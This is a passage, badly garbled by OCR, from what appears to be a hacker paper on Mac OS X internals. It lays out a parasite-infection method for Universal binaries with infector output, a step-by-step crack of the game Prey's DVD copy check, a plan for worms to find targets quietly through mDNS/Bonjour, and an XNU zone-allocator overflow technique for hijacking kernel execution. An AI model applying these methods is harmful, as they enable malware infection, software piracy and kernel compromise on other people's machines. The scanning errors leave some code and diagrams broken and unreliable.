this. Mach-O files can be identified by the first four bytes of 
the file which contain the magic number Oxfeedfac 


Recently Mac OS X has moved from the PowerPC platform to Intel 
architecture. This move has caused a new binary format to be 

used for most of the applications on Mac OS X 10.4. The Universal 
Binary format is defined in the Mach-O Runtime reference from 
Apple. [4]. 


The Universal Binary format is a fairly trivial archive format 
which allows for multiple Mach-O files of varying architecture 
types to be stored in a single file. The loader on Mac OS X is 
able to interpret this file and distinguish which of the Mach-oO 
files inside the archive matches the architecture type of the 
current system. (We’11 look at this a little more later.) 


The structures used by Mac OS X to define and parse Universal 
binaries are contained in the file /usr/include/mach-o/fat.h. 


Universal binaries are recognizable, again, by the magic number 
in the first four bytes of the file. Universal binaries begin 
with the following header: 


struct fat_header { 

uint32_t magic; /* FAT_MAGIC */ 

uint32_t nfat_arch; /* number of structs that follow */ 
}; 


The magic number on a universal binary is as follows: 


define FAT_MAGIC Oxcafebabe 
#define FAT_CIGAM Oxbebafeca /* NXSwapLong(FAT_MAGIC) */ 


Either FAT_MAGIC or FAT_CIGAM is used depending on the endian of 
the file/system. 


The nfat_arch field of this structure contains the number of 
Mach-O files of which the archive is comprised. On a side note 
if you set this high enough to wrap, just about every debugging 
tool on Mac OS X will crash, as demonstrated below: 


—[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file 
—[nemo@fry:~]$ otool -tv file 
Segmentation fault 


For each of the Mach-O files in the Universal binary there 
is also a fat_arch structure. 


This structure is shown below: 


struct fat_arch { 


cpu_type_t cputype; /* cpu specifier (int) */ 
cpu_subtype_t cpusubtype; /* machine specifier (int) */ 
uint32_t offset; /* file offset to this object file */ 
uint32_t size; /* size of this object file */ 
uint32_t align; /* alignment as a power of 2 */ 


}; 


The fat_arch structure defines the architecture type of the 
Mach-O file, as well as the offset into the Universal binary 
in which it is stored. It also contains the alignment of the 
architecture for the particular file, expressed as a power 
Of. 2% 
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The diagram below describes the layout of a typical Universal 
binary: 
YOU SWITCH CAPITALIZATION OF UNIVERSAL QUITE OFTEN IN THIS SECTION] 


Oxcafebabe 
struct fat_header 


fat_arch struct #1 


fat_arch struct #2 | enn ----4 L 


fat_arch struct #n 0 | aa====4 L 


Oxfeedface 


Mach-O File #1 


Oxfeedface 


Mach-O File #2 


Oxfeedface 


Mach-O file #n 


Here you can s the file beginning with a fat_header 
structure. Following this are n * fat_arch structures 
each defining the offset into the file to find the 
particular Mach-O file described by the structure. 
Finally n * Mach-O files are appended to the structs. 


Before I run through the method for infecting Universal 
binaries I will first show how the kernel loads them. 


The file: xnu/bsd/kern/kern_exec.c contains the code 
shown in this section. 


First the kernel sets up a NULL terminated array of 
execsw structs. Each of these structures contain a 
function pointer to an image activator / parser for 
the different image types, as well as a relevant string 
description. 


The definition and declaration of this array is shown 
below: 


/* 

* Our image activator table; this is the table of the image types we ar 
* capable of loading. We list them in order of preference to ensure th 
* fastest image load speed. 

* 


* XXX hardcoded, for now; should use linker sets 
AL 
struct execsw { 
int (*ex_imgact) (struct image_params *); 
const char *ex_name; 
} execsw[] = { 
{ exec_mach_imgact, "Mach-o Binary" }, 
{ exec_fat_imgact, "Fat Binary" }, 
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ifdef IMGPF_POWERPC 
{ exec_powerpc32_imgact, "PowerPC binary" }, 
endif /* IMGPF_POWERPC */ 
{ exec_shell_imgact, "Interpreter Script" }, 
{ NULL, NULL} 


}; 


The following code from the execve() system call loops 
through each of the elements in this array and calls 
the function pointer for each one. A pointer to the 
start of the image is passed to it. 


int 
execve (struct proc *p, struct execve_args *uap, register_t *retval) 


{ 


for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++) 


rror = (*execsw[i].ex_imgact) (imgp) ; 


Each of the functions parses the file to determin 
if the file is of the appropriate architecture type. 
The function which is responsible for matching and 
parsing Universal binaries is the "exec_fat_imgact" 
function. 


[The declaration of this function is below: 


/ 


exec_fat_imgact 


we are going to attempt to execute. At present, this consists of 
reloading the first page for the image with a first page from the 
offset location indicated by the fat header. 


Important: This image activator is byte order neutral. 


Note: If we find an encapsulated binary, we make no assertions 


AS BEE SE SB oe OO BEL Sh aie ab 


* 


that activator is responsible for determining validity. 
a 

static int 

exec_fat_imgact (struct image_params *imgp) 


The first thing this function does is test the 
magic number at the top of the file. The following 


code does this. 


/* Make sure it’s a fat binary */ 


if ((fat_header->magic != FAT_MAGIC) && 
(fat_header->magic != FAT_CIGAM)) { 
error = -l; 
goto bad; 
} 
The fatfile_getarch_affinity() function is then 


called to search the universal binary for a 
Mach-O file with the appropriate architecture 
type for the system. 


/* Look up our preferred architecture in the fat file. */ 
lret = fatfile_getarch_affinity (imgp->ip_vp, 
(vm_offset_t) fat_header, 


Image activator for fat 1.0 binaries. If the binary is fat, then we 
need to select an image from it internally, and make that the image 


about its validity; instead, we leave that up to a rescan 
for an activator to claim it, and, if it is claimed by one, 
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&fat_arch, 
(p->p_flag & P_AFFINITY)); 


This function is defined in the file: 
xnu/bsd/kern/mach_fat.c. 


load_return_t 
fatfile_getarch_affinity ( 


struct vnode *vp, 

vm_offset_t data_ptr, 

struct fat_arch *archret, 

int affinity) 


This function searches each of the Mach-O files within the 
Universal binary. A host has a primary and secondary architecture. 
If during this search, a Mach-O file is found which matches 

the primary architecture type for the host, this file is 

used. If, however, the primary architecture type is not 

found, yet the secondary type is found, this will be used. 

This is useful when infecting this format. 


Once an appropriate Mach-O file has been located the imgp 
ip_arch_offset and ip_arch_size attributes are updated to 
reflect the new position in the file. 


/* Success. Indicate we have identified an encapsulated binary */ 
error = -2; 

imgp->ip_arch_offset = (user_size_t) fat_arch.offset; 
imgp->ip_arch_size = (user_size_t) fat_arch.size; 


After this fatfile_getarch_affinity() simply returns and lets 
execve() continue walking the execsw[] struct array to find 
an appropriate loader for the new file. 


This logic means that it does not really matter if the 
true architecture type of the file matches up with the 
architecture specified in the fat_header struct within 
t 
b 


he Universal binary. Once a Mach-O file is chosen it will 
e treated as a fresh binary. 


The method which I propose to infect Universal binaries 
utilizes this behavior. A breakdown of this method is 
as follows: 


1) Determine the primary and secondary architecture types 
for the host machine. 

2) Parse the fat_header struct of the host binary. 

3) Walk through the fat_arch structs and locate the 
struct for the secondary architecture type. 

4) Check that the size of the parasite is smaller than the 
secondary architecture Mach-O file in the Universal binary. 

5) Copy the parasite binary directly over the secondary arch 
binary inside the universal binary. 

6) Locate the primary architecture’s fat_arch structure. 

7) Modify the architecture type field in this structure to be 
Oxdeadbeef. 


Now when the binary is executed, the primary architecture 

is not found. Due to this, the secondary architecture is 

used. The imgp is set to point to the offset in the file 
containing our parasite, and this is executed as expected. 

The parasite then opens it’s own binary (which is quite 
possible on Mac OS X) and performs a linear search for 
Oxdeadbeef. It then modifies this value, changing it back 

to the primary architecture type and execve()’s it’s own file. 


Some sample code has been provided with this paper that 
demonstrates this method on Intel architecture. The cod 
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unipara.c will copy an Intel architecture Mach-O fil 
over the PowerPC Mach-O file inside a Universal binary. 
After infection has occurred the size of the host file 
remains unchanged. 


—-[nemo@fry:~/code/unipara]$ ./unipara host parasite 
—[nemo@fry:~/code/unipara]$ ./host 
uid=501 (nemo) gid=501 (nemo) 
—[nemo@fry:~/code/unipara]$ we -c host 
43028 host 
—[nemo@fry:~/code/unipara]$ ./unipara parasite host 
[+] Initiating infection process. 
[+] Found: 2 arch structs. 
[+] We are good to go, attaching parasite. 
[+] 
[+] 


parasite implanted at offset: 0x6000 
Switching arch types to execute our parasite. 
nemo@fry:~ /code/unipara]$ we -c host 
43028 host 
—[nemo@fry:~/code/unipara]$ ./host 
Hello, World! 
uid=501 (nemo) gid=501 (nemo) 


If residency is required after the payload has already been 
xecuted, the parasite can simply fork() before modifying 

it’s binary. The parent process can then execve() while the child 

waits and then returns the architecture type to Oxdeadbeef. 


--[ 8 - Cracking Example - Prey 


Recently, during an extra long stopover in LAX airport (the most 
boring airport in the entire world) I decided I would pass the 
time by playing the game "Prey" which I had installed onto my 
laptop. 


To my horror, when I tried to start up my game, I was greeted 
with the following error message: 


"Please insert the disc "Prey" or press Quit." 

"Veuillez inserer le disque "Prey" ou appuyer sur Quitter." 
"Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie 
auf Beenden." 


Since I had nothing better to do, I decided to spend some 
time removing this error message. First things first I 
determined the object format of the executable file. 


-[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ file Prey 
Prey: Mach-O universal binary with 2 architectures 

Prey (for architecture ppc): Mach-O executable ppc 

Prey (for architecture i386): Mach-O executable i386 


The Prey executable is a Universal binary containing a 
PowerPC and an i386 Mach-O binary. 


Next I ran the otool -o command to determine if the code 
was written in Objective-C. The output from this command 
shows that an Objective-C segment is present in the file. 


—[nemo@largeprompt]$ otool -o Prey | head -n 5 
Prey: 
Objective-C segment 
Module 0x27ef458 
version 6 
size 16 


I then used the "class-dump" command [14] to dump the 
class definitions from the file. Probably the most 
interesting of which is shown below: 
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@interface DOOMController (Private) 
— (void) quakeMain; 

— (BOOL) checkRegCodes; 

— (BOOL) checkOS; 

— (BOOL) checkDVD; 

@end 


Most games on Mac OS X are 10 years behind their Windows 
counterparts when it comes to copy protection. Typically 
the developers don’t even strip the file and symbols are 
still present. Because of this fact, I fired up gdb and 
put a breakpoint on the main function. 


(gdb) break main 
Breakpoint 1 at 0x96b64 


However when I executed the file th rror message was 
displayed prior to my breakpoint in main being reached. 
This lead me to the conclusion that a constructor 
function was responsible for check. 


[To validate this theory I ran the command "otool -1" on 
the binary to list the load commands present in the file. 
(The Mach-O Runtime Document [4] explains the load_command 
struct clearly). 


Each section in the Mach-O file has a "flags" value 
associated with it. This describes the purpose of the 
section. Possible values for this flags variable are 
found in the file: /usr/include/mach-o/loader.h. 


The value which represents a constructor section is 
defined as follows: 


/* section with only function pointers for initialization*/ 
#define S_MOD_INIT_FUNC_POINTERS 0x9 
Looking through the "otool -1" output there is only one 


section which has the flags value: 0x9. This section is 
shown below: 


Section 
sectname __mod_init_func 
segname __ DATA 
addr 0x00515cec 
size 0x00000380 
offset 5328108 
align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x00000009 
reservedl 0 
reserved2 0 


Now that the virtual address of the constructor section 
for this application was known, I simply fired up gdb 
again and put breakpoints on each of the pointers 
contained in this section. 


(gdb) x/x 0x00515cec 


O0x515cec <_ZTI14idSIMD_Generict12>: O0x028cc8db 
(gdb) 
Ox515cf0O <_ZTI14idSIMD_Generict16>: 0x00495852 
(gdb) 
Ox515cf4 <_ZTI14idSIMD_Generict20>: 0x0049587c 
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(gdb) break *0x028cc8db 
Breakpoint 1 at O0x28cc8db 
(gdb) break *0x00495852 
Breakpoint 2 at 0x495852 
(gdb) break *0x0049587c 
Breakpoint 3 at 0x49587c 


I then executed the program. As expected the first break point 
was hit before the error message box was displayed. 


(gdb) r 
Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey 


Breakpoint 1, 0x028cc8db in dyld_stub_logl0Of () 
(gdb) continue 


I then continued execution and the error message appeared. This 
happened before the second breakpoint was reached. This indicated 
that the first pointer in the __mod_init_func was responsible for 
the DVD checking process. 


In order to validate my theory I restarted the process. This time 
I deleted all breakpoints except the first one. 


(gdb) delete 

Delete all breakpoints? (y or n) y 
(gdb) break *0x028cc8db 

Breakpoint 4 at O0x28cc8db 


(gdb) r 
Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey 
Reading symbols for shared libraries . done 


Once the breakpoint is reached, I simply "return" from the 
constructor, without testing for the DVD. 


Breakpoint 4, O0x028cc8db in dyld_stub_loglOf () 

(gdb) ret 

Make selected stack frame return now? (y or n) y 

#0 Ox8fedOfcc4 in _dyld__ZN16ImageLoaderMachOlédoInitialization... () 
And then continue execution. 


(gdb) c 


The error message was gone and Prey started up as if the DVD 

was in the drive, SUCCESS! After playing the game for about 10 
minutes and running through the same boring corridor over and 
over again I decided it was more fun to continue cracking the 
game than to actually play it. I exited the game and returned 
to my shell. 


In order to modify the binary I used the HT Editor. [15] 
Before I could use HTE to modify this file however, I had to 
extract the appropriate architecture for my system from the 
Universal binary. I accomplished this using the ditto command 


as follows. 


—[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ ditto -arch i386 Prey Prey.i386 
—[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ cp Prey Prey.backup 
—[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ cp Prey.i386 Prey 


I then loaded the file in HTE. I pressed F6 to select the mod 
and chose the Mach-O/header option. I then scrolled down to 
find the __mod_init_func section. This is shown as follows: 


*KE* Section 3 exes 
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name 
name 
address 
size 


file offset 

alignment 

relocation file offset 
number of relocation entries 


flags 


reservedl 
reserved2 


__mod_init_func 
__ DATA 
00515cec 
00000380 
00514cec 
00000002 
00000000 
00000000 
00000009 
00000000 
00000000 


In order to skip the first constructor I simply added four 


bytes to the virtual address field, 
bytes from the size. 


AEA SSCEDON: SL eee 


section 
segment 
virtual 
virtual 


name 
name 
address 
size 


file offset 

alignment 

relocation file offset 
number of relocation entries 


flags 


reservedl 
reserved2 


I then saved this new binary and executed it, 


and subtracted four 


= 


I did this by pressing F4 in HTE and 
typing the values. Here is the new values: 


__mod_init_func 
__ DATA 

00515cf0 <== += 
O0000037c <== -= 
00514cec 
00000002 
00000000 
00000000 
00000009 
00000000 
00000000 


again Prey 
started up fine without mentioning the missing DVD. 


Finally I repeated this process for the PowerPC binary 
and packed the two back together into a Universal binary 
using the lipo command. 


--[ 9 - Passive malware propagation with mDNS 


As I’m sure all of you are aware, 


the only reason for the 


lack of malware on Mac OS X is due to the lack of market 


share (And therefore lack of people caring). 


In this section I propose a way to remedy this. 
utilizes one of the default services which ships on Mac OS X 


10.4 at 


the time of writing: mDNSResponder. 


This method 


The mDNSResponder service is an implementation of the 
multicast DNS protocol. This protocol is documented 


thoroughly by several of the 


Also if 
to read 


documents linked from [17]. 


you’re interested in the protocol it makes sense 


the RFC [18]. 


At a packet level the multicast DNS protocol is very similar 


to regular DNS. 


purpose: 


also designed to al 
browsable. 


It also serves a similar 


(yet different) 


mDNS is used to create a way for hosts on a LAN 
to automagically configure their network settings and begin 
communication without a DHCP server on the network. It is 


llow the services on a network to be 


Recently, mDNS implementations have been shipping for a large 
of operating systems, including Mac OS X, Vista, Linux 
and a variety of hardware devices such as printers. The mDNS 
implementation which is packaged with Mac OS X is called 


variety 


Bonjour. 


Bonjour contains a useful API for registering and browsing 


a 
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services advertised by mDNS. The daemon mDNSResponder is 
responsible for all the network communication via a mach port 
named "com.apple.mDNSResponder" that is made available to the 
system for communication with the daemon. The documentation 
for the API which is used to manipulate this daemon is found 
at [19]. 


The command line tool /usr/bin/mdns also exists for manipulating 
the mDNSResponder daemon directly [20]. This tool has the following 


functionality: 

—[nemo@fry:~]$ mdns 

mdns —-E (Enumerate recommended registration domains) 
mdns —-F (Enumerate recommended browsing domains) 
mdns —B <Type> <Domain> (Browse for services instances) 
mdns -L <Name> <Type> <Domain> (Look up a service instance) 
mdns -R <Name> <Type> <Domain> <Port> [<TXT>...] (Register a service) 
mdns -A (Test Adding/Updating/Deleting a record) 
mdns —U (Test updating a TXT record) 
mdns —N (Test adding a large NULL record) 
mdns —T (Test creating a large TXT record) 
mdns —M (Test creating a registration with multiple TXT records) 
mdns —I (Test registering and then immediately updating TXT record) 
Here is an example demonstrating using this tool to look for SSH 


instances: 


—[nemo@fry:~]$ mdns -B _ssh._tcp. 
Browsing for _ssh._tcp.local 


Talking to DNS SD Daemon at Mach port 3843 
Timestamp A/R Flags Domain Service Type Instance Name 
11:16:45.816 Add 1 local. _ssh._tcp. fry 


As you can see, this functionality would be very useful for 
malware installed on a new host. 


Once a worm has compromised a new host, it must then scan for 
new targets to attack. This scanning is one of the most common 
ways for a worm to be detected on a network. In the case of 

Mac OS X, where a large amount of scanning would be required to 
find a single target, this will more likely be the cas 


We can use the Bonjour API to wait silently for a service to 
advertise itself to our code, then infect the target as 
necessary. This will greatly reduce the network traffic 
required for worm propogation. 


The header file which contains the definition for the structs 

and functions needed is /usr/include/dns_sd.h. The functions 
needed are contained within libSystem and are therefor linked with 
almost every binary on the system. This is good news if you have 
just infected a new process and wish to perform the mDNS lookup 
from inside it’s address space. 


The Bonjour API allows us to register a service, enumerat 
domains as well as many other useful things. I will only 
focus on browsing for an instance of a particular type of 
service in this paper, however. This is a relatively 
straight forward process. 


The first function needed to find an instance of a service is the 
DNSServiceBrowse() function (shown below). 


DNSServiceErrorType DNSServiceBrowse ( 
DNSServiceRef *sdRef, 
DNSServiceFlags flags, 
uint32_t interfaceIndex, 
const char *regtype, 
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const char *domain, /* may be NULL */ 
DNSServiceBrowseReply callBack, 
void *context /* may be NULL */ 


i 


The arguments to this are fairly straight forward. We simply 
pass an uninitialized DNSServiceRef pointer, followed by an 
unused flags argument. The interfaceIndex specifies th 
interface on which to perform the query. Setting this to 0 
results on this query broadcasting on all interfaces. The 

regtype field is used to specify the type of service we wish 
to browse for. In our example we will search for ssh. So the 
string "_ssh._tcp" is used to specify ssh over tcp. Next the 
domain argument is used to specify the logical domain we wish 
to browse. If this argument is NULL, the default domains are 
used. Finally a callback must be supplied in order to indicate 
what to do once an instance is found. This function can include 
our infection/propagation code. 


Once the call to DNSServiceBrowse() has been made, the function 
DNSServiceProcessResult() must be used to begin processing. 


This function simply takes the sdRef, initialized from the 
first call to DNSServiceBrowse(), and calls the callback 
function when results are received. It will block until 
finding an instance. 


Once a service is found, it must be resolved to an IP address 
and port so it can be infected. 


To do this the DNSServiceResolve() function can be used. 
This function is very similar to the DNSServiceBrowse () 
unction, however a DNSServiceResolveReply() callback 
s used. Also the name of the service must already be 


i 
known. The function prototype is as follows; 


: 


DNSServiceErrorType DNSServiceResolve ( 
DNSServiceRef *sdRef, 
DNSServiceFlags flags, 
uint32_t interfaceIndex, 
const char *name, 
const char *regtype, 
const char *domain, 
DNSServiceResolveReply callBack, 
void *context /* may be NULL */ 


i 


The callback for this function receives the following 
arguments: 


DNSServiceResolveReply resolve_target ( 
DNSServiceRef sdRef, 
DNSServiceFlags flags, 
uint32_t interfaceIndex, 
DNSServiceErrorType errorCode, 
const char *fullname, 
const char *hosttarget, 
uint1l6_t port, 
uintl6_t txtLen, 
const char *txtRecord, 
void *context 


i 


Once again we must call the DNSServiceProcessResult () 
function, passing the sdRef received from DNSServiceResolv 
to begin processing. 


Once within the callback, the port which the service runs 
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on is passed in as a short in network byte order. 


Retrieving the IP address is simply a case of calling 
gethostbyname() on the hosttarget argument. 


I have included some code in the Appendix (discover.c) 
which demonstrates this clearly. This code can sit ina 
loop to enumerate each of the services and infect them. 


Opensshd warez not included. ;-) 


[ 10 Kernel Zone Allocator exploitation 


A zone allocator is a memory allocator which is designed 
for efficient allocation of objects of identical size. 


In this section I will look at how the mach zone allocator, 
(the zone allocator used by the XNU kernel) works. Then I 
will look at how an overflow into the pages used by the zone 
allocator can be exploited. 


The source for the mach zone allocator is located in the file 
xnu/osfmk/kern/zalloc.c. 


Some of objects in the XNU kernel which use the mach zone 
allocator for allocation are; The task structs, the thread 
structs, the pipe structs and the zone structs themselves. 


A list of the current zones on the system can be retrieved 
from userspace using the host_zone_info() function. Mac OS X 
ships with a tool which takes advantage of this: 


/usr/bin/zprint 
This tool displays each of the zones and their element size, 


current size, max size etc. Here is some sample output from 
running this program. 


elem cur max cur max cur alloc alloc 

zone name size size size elts #elts inuse size count 
zones 80 11K 12K 152 153 95 4k 51 
vm.objects 136 3609K 3888K 27180 29274 21116 4K BOC 
vm.object.hash.entries 20 374K 512K 19176 26214 17674 4K 204 C 
tasks 432 59K 432K 141 1024 113 20K 47 Cc 
threads 868 329K 2172K 389 2562 295 56K 66 C 
uthreads 296 114K 740K 396 2560 296 16K Dae 
alarms 44 3K 4K 93 93 2 4K 93°C 
load_file_server 36 56K 492K 1605 13994 1605 4K 113 
mbuf 256 OK 1024K 0 4096 0 4K 16 C 
socket 344 38K 1024K 114 3048 WES) 20K DOYS 
It also gives you a chance to s some of the different types 


of objects which utilize the zone allocator. 


Before I demonstrate how to exploit an overflow into these 
zones, we will first look at how the zone allocator functions. 


When the kernel wishes to start allocating objects within a zone 
the zinit() function is first called. This function is used to 
allocate the zone which will contain each member of that 
specific object type. The information about the newly created 
zone needs a place to stay. The "struct zone" struct is used to 
accommodate this information. The definition of this struct is 
shown below. 
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struct zone { 


/* 
/* 


/* boolean_t */ waiting 
/* boolean_t */ async_pending 


g 
a 


The first thing t 
an existing zone in which to stor 
lobal pointer "zone_zone" 
llocator has not yet b 
used to allocate more space for th 


int 
vm_offset_t 
decl_mutex_data ( 


Cc 
£ 


v 
vm_size_t Cc 
vm_size_t m 
vm_size_t e 
vm_size_t a 


unsigned int 
/* boolea 
boolean_t 
boolean_t 
/* boolean_ 
/* boolean_t 


*/ e 
coll 
expa 
x/ a 
ae as | 


nt */d 
ne * n 
data_t 


/* boolea 
struct Zo 
call_entry 
/* callout 
const char 
ZONE_DEBUG 
queue_head_t 

/* ZONE_DEBUG 


* 


a 


af 


hat the 
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ount; /* Number of elements used now */ 
ree_elements; 

lock) /* generic lock */ 

ur_size; /* current memory utilization */ 
ax_size; /* how large can this zone grow */ 
lem_size; /* size of an element */ 
lloc_size; /* size used for more memory */ 
xhaustible :1, /* (F) merely return if empty? */ 
ectable :1, /* (F) garbage collect empty pages */ 
ndable :1, /* (T) expand zone (with message)? */ 
llows_foreign :1,/* (F) allow non-zalloc space */ 


oing_alloc :1, 
Sly 
ay, 
oing_ge :1; 
ext_zone; 


/* is zone expanding now? */ 

/* is thread waiting for expansion? */ 
/* asynchronous al 
/* garbage col 
/* Link for all 


location pending? */ 
lect in progress? */ 
-zones list */ 


call_async_alloc; 


zone_name; 


ctive_zones; 


zinit() function 


for asynchronous alloc */ 
/* a name for the zone */ 


/* active elements */ 


does is check if there is 


th 


n used, th 


new zon 
is used for this. 
zget_space () 


struct. The 
If the mach zone 
function is 
(zone_zone). 


Zones 


zon 


The code which performs this check is as follows: 


(vm_offset_t *) &z) 


if (zone_zone == ZONE_NULL) { 
if (zget_space(sizeof(struct zone), 
!= KERN_SUCCESS) 
return (ZONE_NULL) ; 
} else 
Z = (zone_t) zalloc(zone_zone); 
If the zone_zon xists, the zalloc() function is used to 
retrieve an element from the zone. Each of the attributes 


of this new zone is then populated. 


As you can see, 
initialized to 0. 


z—->free_elements 
z->cur_size = 0; 
z->max_Size = max 
z->elem_size si 
z—->alloc_size a 


, 
Ze; 
lloc; 


z->zone_nam 

z->count 0; 
z->doing_alloc 
z—->doing_gc 
z—->exhaustibl 
z->collectabl 
z—->allows_foreign 
z—->expandable 
Z—->waiting 
z—->async_pending 


FAL 


= name; 


FAL 
SE; 
F 


a 


The fr 


The zon 


elements 


linked 


list 


is 


e_init() 


function returns 


a zone_t pointer which is used for each al 


of new objects with zalloc(). 


Zinit () 


uses the zalloc_a 


and free a single element 


sync() 
in the zone. 


llocation 


Before returning 
function to allocate 
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Now that the zone is set up, the zalloc() and zfree() 
functions are used to allocate and free elements from 
the zone. Also zget() is used to perform a non-blocking 


allocation from the zone. 


Firstly I will look at the zalloc() function. zalloc() 
is basically a wrapper function around the 
zalloc_canblock() function. 


The first thing zalloc_canblock() does is attempt to 
remove an element from the zone’s free_elements list 
and use it. The following macro (REMOVE_FROM_ZONE) is 
responsible for doing this. 


#define REMOVE_FROM_ZONE (zone, ret, type) 
MACRO_BEGIN 


(ret) = (type) (zone)->free_elements; 
if ((ret) != (type) 0) { 
if (!is_kernel_data_addr(((vm_offset_t *) (ret))[0])) f 
panic("A freed zon lement has been modified.\n"); 


} 
(zone) —>count+t; 
(zone) ->free_elements = *((vm_offset_t *) (ret)); 


} 
MACRO_END 
#else /* MACH_ASSERT */ 


As you can see, this macro simply returns the 
free_elements pointer from the zone struct. It 
also increments the count attribute and sets the 
free_elements attribute of the zone struct to 
the "next" free element. It does this by 
dereferencing the current fr lements address. 
This shows that the first 4 bytes of an unused 
allocation in a zone is used as a pointer to the 


next fr lement. This will come in handy to us 
later. 
The check is_kernel_data_addr() is used to make 


sure we haven’t tampered with the list. The 
definition of this check is shown below: 


#define is_kernel_data_addr (a) 
(!(a) || ((a) >= vm_min_kernel_address && !((a) & 0x3))) 


const vm_offset_t vm_min_kernel_address = VM_MIN_KERNEL_ADDRESS; 
#define VM_MIN_KERNEL_ ADDRESS ((vm_offset_t) 0x00001000) 


As you can see this simply checks that the address is 
not 0, it is greater or equal to 0x1000 (which isn’t 
a problem at all) and it’s word aligned. This check does 
not really cause any trouble when exploiting an overflow 
as you’ll see later. 


If there are no free elements in the list the 
doing_alloc attribute of the zone is checked. 


This attribute is used as a lock. If a blocking 
allocation is performed the allocator will sleep until 
this is unset. 


Once it is ok to allocate an element th 
kernel_memory_allocate() function is used to 
allocate one. The allocation is of a fixed 
size for the zone. The kernel_memory_allocate() 
function is used at the base level of pretty 
much all the memory allocators present in the 


XNU kernel. It basically just uses 


POON OO GO OE ge EE 
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vm_page_alloc() to allocate pages. Once the 
zone allocator successfully calls this function 


zcram() is used to break the pages up into 


elements 


and add them to the free_elements list. Each element 


how the workings of zfree(). 


is added in the same way zfree() does so now that 
I have looked at the allocation process I will take 
s 


he zfree() function is used to add an element back 
o the zone fr lements list. The first thing zfree() 


Tf. 
t 
does is to make sure that an element is not being zfree()’ed 
which was never zalloc()’ed. This is done using the 

ie 


rom_zone_map() macro. This macro is defined as follows. 


#define from_zone_map(addr, size) \ 


((vm_offset_t) (addr) >= zone_map_min_address && \ 


((vm_offset_t) (addr) + size 


In the case of an overflow however, this check is not 


particularly important so I will move on. 


Next the zfree() function (if zone debugging is enabled) will 


run through and check that the element did 
a different zone to the one which has been 


not come from 
passed to zfree(). 


If this is the case a kernel panic() is thrown, alerting 


on what the problem was. 


Next zfree() runs through all the free_elements in the zones 
list and calls the pmap_kernel_va() function. The code which 


does this is as follows. 


for (this zone->free_elements; 
this != 0; 
this = * (vm_offset_t *) this) 
if ('pmap_kernel_va(this) | 
panic ("zfree"); 


The pmap_kernel_va() check is shown below. 


define VM_MIN_ KERNEL ADDRESS ((vm_offset_t 
define pmap_kernel_va (VA) \ 


(( (VA) >= VM_MIN_KERNEL_ADDRESS) && 


he pmap_kernel_va check simply checks that 


| this == elem) 


) 0x00001000) 
((VA) <= vm_last_addr) ) 


the address 


is greater than or equal to the VM_MIN_KERNEL_ADDRESS. 


4 


his address is defined (above) as 0x1000, 
the first page of valid kernel memory (stra 
PAGEZERO). It then checks if the address is 
or equal to the vm_last_addr. This is defin 
VM_MAX KERNEL ADDRESS (shown below). 


vm_last_addr = VM_MAX KERNEL ADDRESS; /* 
define VM_MAX KERNEL ADDRESS ( (vm_o 
define VM_MAX KERNEL ADDRESS ((vm_offset_t 


Basically this means that anywhere within a 
address space of the kernel is valid. 


Once these checks are performed, the final 
is to use the ADD_TO_ZONE() macro in order 
element back to the free_elements list int 


Here is the macro used to do this: 


#define ADD_TO_ZONE (zone, element) 
MACRO_BEGIN 


if (zfree_clear) 
{ unsigned int i; 


the start of 
ight after 

less than 
ed as 


Set the highest address 
ffset_t) OxFE7FFFFF) 
) OxDFFFFFFF) 


lmost the entire 


step zfree() does 
to add the free’ed 
he zone struct. 


-1) < zone_map_max_address) 


ae ae BE. 
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i < zone->elem_size/sizeof(vm_offset_t) - 1; 
itt) 
((vm_offset_t *) (element)) [i] = Oxdeadbeef; 
vm_offset_t *) (element)) [0] = (zone)->free_elements; 


} 
( ( 

(zone) ->fr 
(zone) ->count--; 


llocated for the 


elements = (vm_offset_t) 


element which is being free()’ed in 4 byte intervals. 
It writes out Oxdeadbeef to each location, 


the memory. 


and clearing any original 


| data. 


filling 


writes into the first 4 bytes of the allocation, 


old free_elements pointer, 


from the zone struct. 


It then 


the 


Now that I have shown briefly how the zone allocator 


functions I will 


overflow. 


In the diagram bel 
followed by a free element. 
contains the data used by the struct 


sample case the struct is made up.) 


The second 


Oxdeadb 


lement consists of the pointer to the 
free element followed by the unsigned long 


f repeated to fill the struct. 


in use and free elements are the same siz 


low memory 


Elem 


(0x00000000) 


( 
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33 
00 
00 
00 
00 
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00 
00 
00 
00 
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22 
3:3 
00 
00 
00 
00 
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O1 
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33 
00 
00 
00 
00 


[) ate 
ef 
ef 
ef 
ef 
ef 
ef 


Ee 
be 
be 
be 
be 
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be 


Wale 
ad 
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ad 


( 
7d 
de 
de 
de 
de 
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de 


Fr 
] 


Element ) 
<== Pointer to next fr 


Both the 


lement. 


high 


memory 


(Oxffffffff) 


In the case where a buffer within the first 


in use struct is overflown, 


capital A 
the free elements "next" pointer. This is 
demonstrated below. 


low memory 


[O0x41]) 


(0x00000000) 


( 
00 
22 
33 
41 
41 
41 
41 


00 
22 
33 
41 
41 
41 
41 


00 
22 
33 
41 
41 
41 
41 


O1 
22 
33 


Element being overflowed ) 


<== Overflow starts here 


[. 41 


41 


41 


BA PPP AD 


Fr 
] 


Element ) 
<== Overflow into pointer. 


(in this case with 
it is then possible to overwrite 


low you can see an element in use 
The first element 
(in this 


(element) ; 


look at what happens in the case of an 
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ef be ad de 
ef be ad de 
ef be ad de 
ef be ad de 
ef be ad de 
ef be ad de 


high memory (Oxffffffff) 


In this case, when the REMOVE_FROM_ZONE() macro 
is used by zalloc() the user controlled address 
0x41414141 will become the zone struct’s new 
free_elements pointer, and consequently, be 
used by the next allocation of the element type. 


If this address is positioned correctly it may be 
possible to have something user controlled overwrite 
a useful pointer in kernel space and in this way gain 
control of execution. 


Due to the checks performed on zfree() it is 
recommended that efforts should be taken to avoid 
this element being passed to zfree() however. 

As this will result in a kernel panic(). 


--[{ 11 - Conclusion 


Hopefully if you bothered to read this far you learned 
something useful. If not, I apologize. 


If you take any of these ideas and work on them further 
or know of a better method to do anything covered in this 
paper I’d appreciate an email letting me know at: 
